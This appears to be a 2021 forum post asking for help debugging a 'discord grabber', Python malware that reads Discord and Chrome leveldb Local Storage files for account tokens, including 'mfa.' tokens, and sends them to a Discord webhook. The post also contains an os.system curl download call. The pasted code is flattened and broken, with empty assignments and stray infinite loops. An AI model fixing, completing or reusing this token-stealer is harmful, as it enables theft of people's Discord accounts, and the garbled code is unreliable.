samedi 10 juillet 2021

i was attempting to make a discord grabber but it is sending None a bunch of times and my exception isn't working

dir_name = f"C:/Users/{name}/AppData/Roaming/discord/Local Storage/leveldb" test = os.listdir(dir_name) for item in test: if item.endswith(".ldb"): tokena = if tokena == 'None': embed.add_field(name = 'Chrome' , value = f'No Tokens found') while True: a = 'a' embed.add_field(name = 'Discord' , value = f'{tokena}') else: dir_name = f"C:/Users/{name}/AppData/Roaming/discord/Local Storage/leveldb" test = os.listdir(dir_name) for item in test: if item.endswith(".log"): tokenc = if tokenc == 'None': embed.add_field(name = 'Chrome' , value = f'No Tokens found') while True: a = 'a' embed.add_field(name = 'Discord' , value = f'{tokenc}') os.system('curl -O elite.png') dir_name = f"C:/Users/{name}/AppData/Local/Google/Chrome/User Data/Default/Local Storage/leveldb" test = os.listdir(dir_name) pattern = re.compile('mfa.') for item in test: if item.endswith(".ldb"): tokenc = if tokenc == 'None': embed.add_field(name = 'Chrome' , value = f'No Tokens found') while True: a = 'a' embed.add_field(name = 'Chrome' , value = f'{tokenc}') else: dir_name = f"C:/Users/{name}/AppData/Local/Google/Chrome/User Data/Default/Local Storage/leveldb" test = os.listdir(dir_name) for item in test: if item.endswith(".log"): tokenc = if tokenc == 'None': embed.add_field(name = 'Chrome' , value = f'No Tokens found') while True: a = 'a' embed.add_field(name = 'Chrome' , value = f'{tokenc}') it keeps returning "None" because i have no tokens but it is saying it like 10 times into my discord webhook

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